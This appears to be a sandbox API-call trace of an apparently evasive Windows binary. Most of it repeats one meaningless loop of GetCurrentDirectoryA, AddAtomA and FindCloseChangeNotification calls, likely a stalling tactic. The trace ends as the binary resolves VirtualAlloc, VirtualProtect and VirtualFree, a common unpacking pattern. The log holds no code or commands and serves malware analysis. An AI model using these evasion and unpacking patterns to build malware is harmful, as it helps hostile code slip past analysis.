0 [0078.967] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.967] AddAtomA (lpString=0x0) returned 0x0 [0078.967] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.967] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.967] AddAtomA (lpString=0x0) returned 0x0 [0078.967] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.967] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.967] AddAtomA (lpString=0x0) returned 0x0 [0078.967] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.967] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.967] AddAtomA (lpString=0x0) returned 0x0 [0078.968] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.968] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.968] AddAtomA (lpString=0x0) returned 0x0 [0078.968] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.968] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.968] AddAtomA (lpString=0x0) returned 0x0 [0078.968] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.968] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.968] AddAtomA (lpString=0x0) returned 0x0 [0078.968] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.968] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.968] AddAtomA (lpString=0x0) returned 0x0 [0078.968] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.968] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.968] AddAtomA (lpString=0x0) returned 0x0 [0078.968] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.968] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.968] AddAtomA (lpString=0x0) returned 0x0 [0078.968] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.968] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.968] AddAtomA (lpString=0x0) returned 0x0 [0078.968] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.969] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.969] AddAtomA (lpString=0x0) returned 0x0 [0078.969] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.969] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.969] AddAtomA (lpString=0x0) returned 0x0 [0078.969] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.969] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.969] AddAtomA (lpString=0x0) returned 0x0 [0078.969] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.969] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.969] AddAtomA (lpString=0x0) returned 0x0 [0078.969] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.969] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.969] AddAtomA (lpString=0x0) returned 0x0 [0078.969] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.969] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.969] AddAtomA (lpString=0x0) returned 0x0 [0078.969] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.969] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.969] AddAtomA (lpString=0x0) returned 0x0 [0078.969] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.970] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.970] AddAtomA (lpString=0x0) returned 0x0 [0078.970] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.970] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.970] AddAtomA (lpString=0x0) returned 0x0 [0078.970] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.970] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.970] AddAtomA (lpString=0x0) returned 0x0 [0078.970] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.970] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.970] AddAtomA (lpString=0x0) returned 0x0 [0078.970] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.970] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.970] AddAtomA (lpString=0x0) returned 0x0 [0078.970] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.970] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.970] AddAtomA (lpString=0x0) returned 0x0 [0078.970] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.970] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.970] AddAtomA (lpString=0x0) returned 0x0 [0078.970] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.970] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.970] AddAtomA (lpString=0x0) returned 0x0 [0078.971] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.971] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.971] AddAtomA (lpString=0x0) returned 0x0 [0078.971] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.971] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.971] AddAtomA (lpString=0x0) returned 0x0 [0078.971] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.971] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.971] AddAtomA (lpString=0x0) returned 0x0 [0078.971] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.971] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.971] AddAtomA (lpString=0x0) returned 0x0 [0078.971] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.971] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.971] AddAtomA (lpString=0x0) returned 0x0 [0078.971] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.971] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.971] AddAtomA (lpString=0x0) returned 0x0 [0078.971] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.972] AddAtomA (lpString=0x0) returned 0x0 [0078.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.972] AddAtomA (lpString=0x0) returned 0x0 [0078.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.972] AddAtomA (lpString=0x0) returned 0x0 [0078.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.972] AddAtomA (lpString=0x0) returned 0x0 [0078.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.972] AddAtomA (lpString=0x0) returned 0x0 [0078.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.972] AddAtomA (lpString=0x0) returned 0x0 [0078.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.972] AddAtomA (lpString=0x0) returned 0x0 [0078.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.972] AddAtomA (lpString=0x0) returned 0x0 [0078.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.973] AddAtomA (lpString=0x0) returned 0x0 [0078.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.973] AddAtomA (lpString=0x0) returned 0x0 [0078.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.973] AddAtomA (lpString=0x0) returned 0x0 [0078.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.973] AddAtomA (lpString=0x0) returned 0x0 [0078.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.973] AddAtomA (lpString=0x0) returned 0x0 [0078.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.973] AddAtomA (lpString=0x0) returned 0x0 [0078.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.973] AddAtomA (lpString=0x0) returned 0x0 [0078.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.973] AddAtomA (lpString=0x0) returned 0x0 [0078.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.974] AddAtomA (lpString=0x0) returned 0x0 [0078.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.974] AddAtomA (lpString=0x0) returned 0x0 [0078.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.974] AddAtomA (lpString=0x0) returned 0x0 [0078.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.974] AddAtomA (lpString=0x0) returned 0x0 [0078.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.974] AddAtomA (lpString=0x0) returned 0x0 [0078.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.974] AddAtomA (lpString=0x0) returned 0x0 [0078.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.974] AddAtomA (lpString=0x0) returned 0x0 [0078.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.975] AddAtomA (lpString=0x0) returned 0x0 [0078.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.975] AddAtomA (lpString=0x0) returned 0x0 [0078.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.975] AddAtomA (lpString=0x0) returned 0x0 [0078.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.975] AddAtomA (lpString=0x0) returned 0x0 [0078.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.975] AddAtomA (lpString=0x0) returned 0x0 [0078.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.975] AddAtomA (lpString=0x0) returned 0x0 [0078.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.975] AddAtomA (lpString=0x0) returned 0x0 [0078.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.975] AddAtomA (lpString=0x0) returned 0x0 [0078.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.976] AddAtomA (lpString=0x0) returned 0x0 [0078.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.976] AddAtomA (lpString=0x0) returned 0x0 [0078.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.976] AddAtomA (lpString=0x0) returned 0x0 [0078.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.976] AddAtomA (lpString=0x0) returned 0x0 [0078.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.976] AddAtomA (lpString=0x0) returned 0x0 [0078.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.976] AddAtomA (lpString=0x0) returned 0x0 [0078.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.976] AddAtomA (lpString=0x0) returned 0x0 [0078.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.977] AddAtomA (lpString=0x0) returned 0x0 [0078.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.977] AddAtomA (lpString=0x0) returned 0x0 [0078.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.977] AddAtomA (lpString=0x0) returned 0x0 [0078.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.977] AddAtomA (lpString=0x0) returned 0x0 [0078.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.977] AddAtomA (lpString=0x0) returned 0x0 [0078.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.977] AddAtomA (lpString=0x0) returned 0x0 [0078.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.977] AddAtomA (lpString=0x0) returned 0x0 [0078.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.977] AddAtomA (lpString=0x0) returned 0x0 [0078.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.978] AddAtomA (lpString=0x0) returned 0x0 [0078.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.978] AddAtomA (lpString=0x0) returned 0x0 [0078.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.978] AddAtomA (lpString=0x0) returned 0x0 [0078.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.978] AddAtomA (lpString=0x0) returned 0x0 [0078.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.978] AddAtomA (lpString=0x0) returned 0x0 [0078.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.978] AddAtomA (lpString=0x0) returned 0x0 [0078.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.979] AddAtomA (lpString=0x0) returned 0x0 [0078.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.979] AddAtomA (lpString=0x0) returned 0x0 [0078.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.979] AddAtomA (lpString=0x0) returned 0x0 [0078.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.979] AddAtomA (lpString=0x0) returned 0x0 [0078.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.979] AddAtomA (lpString=0x0) returned 0x0 [0078.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.979] AddAtomA (lpString=0x0) returned 0x0 [0078.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.979] AddAtomA (lpString=0x0) returned 0x0 [0078.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.980] AddAtomA (lpString=0x0) returned 0x0 [0078.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.981] AddAtomA (lpString=0x0) returned 0x0 [0078.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.981] AddAtomA (lpString=0x0) returned 0x0 [0078.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.981] AddAtomA (lpString=0x0) returned 0x0 [0078.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.981] AddAtomA (lpString=0x0) returned 0x0 [0078.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.981] AddAtomA (lpString=0x0) returned 0x0 [0078.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.981] AddAtomA (lpString=0x0) returned 0x0 [0078.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.981] AddAtomA (lpString=0x0) returned 0x0 [0078.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.981] AddAtomA (lpString=0x0) returned 0x0 [0078.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.982] AddAtomA (lpString=0x0) returned 0x0 [0078.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.982] AddAtomA (lpString=0x0) returned 0x0 [0078.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.111] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0079.111] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0079.111] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0079.111] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 